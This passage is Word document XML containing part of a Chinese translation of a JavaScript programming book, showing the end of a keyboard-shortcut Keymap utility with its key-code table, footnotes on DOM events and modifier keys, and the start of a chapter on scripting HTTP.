    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var retval=handler.call(element,event,keyid);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果处理程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，取消默认操作并阻止冒泡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(retval==</w:t>
      </w:r>
      <w:r>
        <w:t>=false){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(event.stopPropagation)event.stopPropagation();//DOM</w:t>
      </w:r>
      <w:r>
        <w:t>模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else event.cancelBubble=true;//IE</w:t>
      </w:r>
      <w:r>
        <w:t>模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.preventDefault)event.preventDefault();//DOM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else event.returnValue=false;//IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回处理程序的返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return retval;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>用于把按键标识符转换成标准形式的工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在非</w:t>
      </w:r>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:t>硬件，</w:t>
      </w:r>
      <w:r>
        <w:t>我们这里把</w:t>
      </w:r>
      <w:r>
        <w:t>"meta"</w:t>
      </w:r>
      <w:r>
        <w:t>映射到</w:t>
      </w:r>
      <w:r>
        <w:t>"ctrl"</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这样在</w:t>
      </w:r>
      <w:r>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>"Meta+C"</w:t>
      </w:r>
      <w:r>
        <w:t>将变成</w:t>
      </w:r>
      <w:r>
        <w:t>"Command+C"</w:t>
      </w:r>
      <w:r>
        <w:t>，其他都是</w:t>
      </w:r>
      <w:r>
        <w:t>"Ctrl+C"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.normalize=function(keyid){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>keyid=keyid.toLowerCase();//</w:t>
      </w:r>
      <w:r>
        <w:t>一切都小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var words=keyid.split(/\s+|[\-+_]/);//</w:t>
      </w:r>
      <w:r>
        <w:t>分割辅助键和键名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var keyname=words.pop();//</w:t>
      </w:r>
      <w:r>
        <w:t>键名是最后一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>keyname=Keymap.aliases[keyname]||keyname</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>它是别名吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>words.sort();//</w:t>
      </w:r>
      <w:r>
        <w:t>排序剩下的辅助键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>words.push(keyname);//</w:t>
      </w:r>
      <w:r>
        <w:t>添加到序列化名字后面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return words.join("_");//</w:t>
      </w:r>
      <w:r>
        <w:t>把它们拼接起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.aliases={//</w:t>
      </w:r>
      <w:r>
        <w:t>把按键的常见别名映射到它们的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>正式名</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"escape":"esc",//</w:t>
      </w:r>
      <w:r>
        <w:t>键名使用</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>规范的定义和后面的编码到键名的映射</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"delete":"del",//</w:t>
      </w:r>
      <w:r>
        <w:t>所有的键和值都必须小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"return":"enter",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"ctrl":"control",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"space":"spacebar",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"ins":"insert"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>传统的</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性是不标准的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但下面的值似乎可以在大多数浏览器和</w:t>
      </w:r>
      <w:r>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:t>中可行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Keymap.keyCodeToKeyName={//</w:t>
      </w:r>
      <w:r>
        <w:t>使用词或方向键的按键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>8:"Backspace",9:"Tab",13:"Enter",16:"Shift",17:"Control",18:"Alt",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>19:"Pause",20:"CapsLock",27:"Esc",32:"Spacebar",33:"PageU</w:t>
      </w:r>
      <w:r>
        <w:t>p",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>34:"PageDown",35:"End",36:"Home",37:"Left",38:"Up",39:"Right",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>40:"Down",45:"Insert",46:"Del",//</w:t>
      </w:r>
      <w:r>
        <w:t>主键盘（非数字小键盘）上的数字键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>48:"0",49:"1",50:"2",51:"3",52:"4",53:"5",54:"6",55:"7",56:"8",57:"9",//</w:t>
      </w:r>
      <w:r>
        <w:t>字母按键，注意我们不区分大小写</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>65:"A",66:"B",67:"C",68:"D",69:"E",70:"F",71:"G",72:"H",73:"I",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>74:"J",75:"K",76:"L",77:"M",78:"N",79:"O",80:"P",81:"Q",82:"R",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>83:"S",84:"T",85:"U",86:"V",87:"W",88:"X",89:"Y",90:"Z",//</w:t>
      </w:r>
      <w:r>
        <w:t>数字小键盘的数字和标点符号按键（</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>不支持这些）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>96:"0",97:"1",98:"2",99:"3",100:"4",101:"5</w:t>
      </w:r>
      <w:r>
        <w:t>",102:"6",103:"7",104:"8",105:"9",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>106:"Multiply",107:"Add",109:"Subtract",110:"Decimal",111:"Divide",//</w:t>
      </w:r>
      <w:r>
        <w:t>功能键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>112:"F1",113:"F2",114:"F3",115:"F4",116:"F5",117:"F6",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>118:"F7",119:"F8",120:"F9",121:"F10",122:"F11",123:"F12",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>124:"F13",125:"F14",126:"F15",127:"</w:t>
      </w:r>
      <w:r>
        <w:t>F16",128:"F17",129:"F18",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>130:"F19",131:"F20",132:"F21",133:"F22",134:"F23",135:"F24",//</w:t>
      </w:r>
      <w:r>
        <w:t>不需要按下</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键的标点符号键</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>连字符不兼容，</w:t>
      </w:r>
      <w:r>
        <w:t>FF</w:t>
      </w:r>
      <w:r>
        <w:t>返回的编码和减号一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>59:";",61:"=",186:";",187:"=",//Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>59,61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>188:",",190:".",191:"/",192:"",219:"[",220:"\\",221:"]",222:"'"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>包括</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>规范在内的一些资料基于它们注册的方式从技术上区分处理程序（</w:t>
      </w:r>
      <w:r>
        <w:t>handler</w:t>
      </w:r>
      <w:r>
        <w:t>）和监听程序（</w:t>
      </w:r>
      <w:r>
        <w:t>listener</w:t>
      </w:r>
      <w:r>
        <w:t>），但本书视这两个技术术语为同义词。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>标准为不同的事件类型定义了事件对象接口的等级层次。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>接口定义了无额外详细信息的基础事件，</w:t>
      </w:r>
      <w:r>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:r>
        <w:t>子接口定义了在传递鼠标事件的事件对象中有用的附加字段，而</w:t>
      </w:r>
      <w:r>
        <w:t>KeyEvent</w:t>
      </w:r>
      <w:r>
        <w:t>子接口定义了可用于键盘事件的字段。在本书中，第四部分把所有的常用事件接口都并入到</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>参考页。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>在名字中使用</w:t>
      </w:r>
      <w:r>
        <w:t>"DOM"</w:t>
      </w:r>
      <w:r>
        <w:t>的唯一常用事件就是</w:t>
      </w:r>
      <w:r>
        <w:t>DOMC</w:t>
      </w:r>
      <w:r>
        <w:t>ontentLoaded</w:t>
      </w:r>
      <w:r>
        <w:t>。这个事件由</w:t>
      </w:r>
      <w:r>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r>
        <w:t>引入，但绝不属于</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件标准的一部分。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范并未定义调用顺序，但当前的浏览器都是按照注册顺序调用所有事件处理程序，并且</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范草案标准化了这种行为。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:t>章介绍的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件对象有一个</w:t>
      </w:r>
      <w:r>
        <w:t>defaultPrevented()</w:t>
      </w:r>
      <w:r>
        <w:t>方法而非属性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>单击</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>指的是滚动滚轮的最小单位，所以我们得到的</w:t>
      </w:r>
      <w:r>
        <w:t>wheelDelta</w:t>
      </w:r>
      <w:r>
        <w:t>值都是</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:t>的整数倍，正负值表示滚轮的两个方向，其最小值皆为</w:t>
      </w:r>
      <w:r>
        <w:t>120</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>这是有风险的，如果</w:t>
      </w:r>
      <w:r>
        <w:t>未来的实现不匹配当前使用的规范草案，那么这将适得其反，示例将无法运行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>英文为</w:t>
      </w:r>
      <w:r>
        <w:t>Unobtrusive Javascript</w:t>
      </w:r>
      <w:r>
        <w:t>，在网页中编写</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的一种通用方法。详细内容请看</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Unobtrusive_JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="448" w:name="_9_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="448"/>
      <w:r>
        <w:t>辅助键（</w:t>
      </w:r>
      <w:r>
        <w:t>modifier key</w:t>
      </w:r>
      <w:r>
        <w:t>）一般是指</w:t>
      </w:r>
      <w:r>
        <w:t>Shift</w:t>
      </w:r>
      <w:r>
        <w:t>键、</w:t>
      </w:r>
      <w:r>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>control</w:t>
      </w:r>
      <w:r>
        <w:t>）键、</w:t>
      </w:r>
      <w:r>
        <w:t>Alt</w:t>
      </w:r>
      <w:r>
        <w:t>键、</w:t>
      </w:r>
      <w:r>
        <w:t>AltGr</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>Alternate Graphic</w:t>
      </w:r>
      <w:r>
        <w:t>）键、</w:t>
      </w:r>
      <w:r>
        <w:t>Super</w:t>
      </w:r>
      <w:r>
        <w:t>键（</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>键盘上指</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>键，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mac </w:t>
      </w:r>
      <w:r>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:t>键盘指的是</w:t>
      </w:r>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:t>键，</w:t>
      </w:r>
      <w:r>
        <w:t>Sun</w:t>
      </w:r>
      <w:r>
        <w:t>键盘指的是</w:t>
      </w:r>
      <w:r>
        <w:t>Meta</w:t>
      </w:r>
      <w:r>
        <w:t>键）和</w:t>
      </w:r>
      <w:r>
        <w:t>Fn</w:t>
      </w:r>
      <w:r>
        <w:t>键（</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>，常见于笔记本键盘），更多细节请看</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Computer_keyboard</w:t>
      </w:r>
      <w:r>
        <w:t>。功能键（</w:t>
      </w:r>
      <w:r>
        <w:t>function key</w:t>
      </w:r>
      <w:r>
        <w:t>）一般是指类似</w:t>
      </w:r>
      <w:r>
        <w:t>F1</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>F2</w:t>
      </w:r>
      <w:r>
        <w:t>这些以</w:t>
      </w:r>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:t>加数字组成的键，更多细节请看</w:t>
      </w:r>
      <w:r>
        <w:t>http://en.wikipedia.org/wiki/Function_Keys</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="Di_18Zhang__Jiao_Ben_Hua_HTTP"/>
      <w:bookmarkStart w:id="450" w:name="Di_18Zhang__Jiao_Ben_Hua_HTTP____Chao_We"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章　脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>超文本传输协议（</w:t>
      </w:r>
      <w:r>
        <w:t>HyperText Transfer Protocol</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>）规定</w:t>
      </w:r>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器如何从</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器获取文档和向</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器提交表单内容，以及</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>服务器如何响应这些请求和提交。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器会处理大量</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>。通常，</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>并不在脚本的控制下，只是当用户单击链接、提交表单和输入</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>时才发生。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>但是，用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码操纵</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
